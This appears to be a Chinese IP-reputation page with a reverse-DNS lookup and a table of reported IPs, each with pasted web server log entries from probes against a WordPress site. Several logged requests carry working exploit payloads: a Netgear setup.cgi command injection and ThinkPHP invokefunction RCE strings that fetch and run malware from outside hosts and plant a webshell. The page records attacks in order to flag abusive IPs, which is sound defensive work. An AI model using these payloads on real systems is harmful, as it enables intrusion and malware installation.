城市(city): unknown
省份(region): unknown
国家(country): China
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 222.16.51.247
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 3861
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;222.16.51.247. IN A
;; AUTHORITY SECTION:
. 337 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022010901 1800 900 604800 86400
;; Query time: 59 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Jan 10 08:49:20 CST 2022
;; MSG SIZE rcvd: 106Host 247.51.16.222.in-addr.arpa. not found: 3(NXDOMAIN)Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 247.51.16.222.in-addr.arpa: NXDOMAIN| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 140.143.59.183 | attack | 意图伪装百度爬虫获取整站数据 140.143.59.183 - - [02/Apr/2019:13:18:43 +0800] "GET //www.eznewstoday.com.rar HTTP/1.1" 404 486 "-" "User-Agent\\tBaiduspider" 140.143.59.183 - - [02/Apr/2019:13:18:43 +0800] "GET //www.eznewstoday.com.zip HTTP/1.1" 404 486 "-" "User-Agent\\tBaiduspider" 140.143.59.183 - - [02/Apr/2019:13:18:44 +0800] "GET //eznewstoday.com.rar HTTP/1.1" 404 482 "-" "User-Agent\\tBaiduspider" 140.143.59.183 - - [02/Apr/2019:13:18:45 +0800] "GET //eznewstoday.com.zip HTTP/1.1" 404 482 "-" "User-Agent\\tBaiduspider" 140.143.59.183 - - [02/Apr/2019:13:18:45 +0800] "GET //eznewstoday.rar HTTP/1.1" 404 478 "-" "User-Agent\\tBaiduspider" 140.143.59.183 - - [02/Apr/2019:13:18:46 +0800] "GET //eznewstoday.zip HTTP/1.1" 404 478 "-" "User-Agent\\tBaiduspider" |
2019-04-02 14:33:43 |
| 139.199.87.173 | attack | 139.199.87.173 - - [29/Mar/2019:07:19:11 +0800] "POST /xmlrpc.php HTTP/1.1" 404 3693 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" WP攻击 |
2019-03-29 07:22:13 |
| 115.87.27.91 | attack | 115.87.27.91 - - [04/Apr/2019:18:44:53 +0800] "GET /mysql/admin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" |
2019-04-04 18:46:39 |
| 157.55.39.74 | bots | 微软爬虫bingbot 157.55.39.74 - - [02/Apr/2019:14:26:06 +0800] "GET /index.php/2018/09/08/zte_2018_09_08_cn/ HTTP/1.1" 200 14334 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" |
2019-04-02 14:27:16 |
| 42.236.10.84 | bots | 没有UA的360爬虫 42.236.10.84 - - [03/Apr/2019:08:55:07 +0800] "GET /wp-includes/css/dist/block-library/theme.min.css?ver=5.1.1 HTTP/1.1" 200 1017 "https://www.eznewstoday.com/index.php/2019/04/03/amazon_2019_04_03_cn/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 42.236.10.75 - - [03/Apr/2019:08:55:07 +0800] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.1.1 HTTP/1.1" 200 4864 "https://www.eznewstoday.com/index.php/2019/04/03/amazon_2019_04_03_cn/" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" |
2019-04-03 09:08:57 |
| 78.101.86.240 | attack | 78.101.86.240 - - [03/Apr/2019:12:25:10 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://185.22.154.89/bins/September.mips%20-O%20/var/tmp/September.mips;%20chmod%20777%20/var/tmp/September.mips;%20/var/tmp/September.mips;%20rm%20-rf%20/var/tmp/September.mips&curpath=/¤tsetting.htm=1" 400 0 "-" "-" |
2019-04-03 12:28:10 |
| 118.190.84.33 | attack | 118.190.84.33 - - [04/Apr/2019:13:19:38 +0800] "POST /wuwu11.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" 118.190.84.33 - - [04/Apr/2019:13:19:38 +0800] "GET /wuwu11.php HTTP/1.1" 404 232 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" 118.190.84.33 - - [04/Apr/2019:13:19:38 +0800] "POST /wuwu11.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" 118.190.84.33 - - [04/Apr/2019:13:19:38 +0800] "GET /wuwu11.php HTTP/1.1" 404 232 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" 118.190.84.33 - - [04/Apr/2019:13:19:39 +0800] "POST /wuwu11.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" 118.190.84.33 - - [04/Apr/2019:13:19:39 +0800] "GET /wuwu11.php HTTP/1.1" 404 232 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" |
2019-04-04 13:26:43 |
| 66.102.6.14 | bots | 也是谷歌爬虫不是真实流量 66.102.6.14 - - [29/Mar/2019:08:22:44 +0800] "GET / HTTP/1.1" 200 3237 "http://www.google.com/search" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/41.0.2272.118 Safari/537.36" |
2019-03-29 09:19:24 |
| 118.25.71.65 | attack | 攻击型IP
118.25.71.65 - - [31/Mar/2019:17:57:14 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.71.65 - - [31/Mar/2019:17:57:14 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.71.65 - - [31/Mar/2019:17:57:14 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-03-31 17:58:18 |
| 193.201.224.220 | attack | wordpress 暴力破戒攻击 193.201.224.220 - - [31/Mar/2019:18:05:02 +0800] "POST /wp-login.php HTTP/1.1" 200 5002 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0" |
2019-03-31 19:57:42 |
| 207.46.13.229 | bots | 微软bingbot |
2019-03-29 09:12:04 |
| 195.231.8.124 | attack | 195.231.8.124 - - [04/Apr/2019:11:25:59 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://185.244.25.145/love/ai.x86%20;chmod%20777%20*%20ai.x86;%20cat%20ai.x86%20%3E%20efjins;chmod%20777%20efjins;./efjins%20thinkphp HTTP/1.1" 301 194 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.5.1.el7.x86_64" |
2019-04-04 11:57:20 |
| 123.190.159.103 | attack | 垃圾IP攻击型 123.190.159.103 - - [31/Mar/2019:21:47:14 +0800] "GET /otsmobile/app/mds/mgw.htm HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" |
2019-03-31 21:50:23 |
| 58.251.121.184 | attack | 58.251.121.184 - - [01/Apr/2019:15:40:52 +0800] "GET /super.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.186 - - [01/Apr/2019:15:40:52 +0800] "GET /ww.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-01 15:41:42 |
| 46.37.12.23 | attack | 46.37.12.23 - - [01/Apr/2019:09:07:28 +0800] "GET /admin//config.php HTTP/1.1" 404 232 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5" |
2019-04-01 09:08:57 |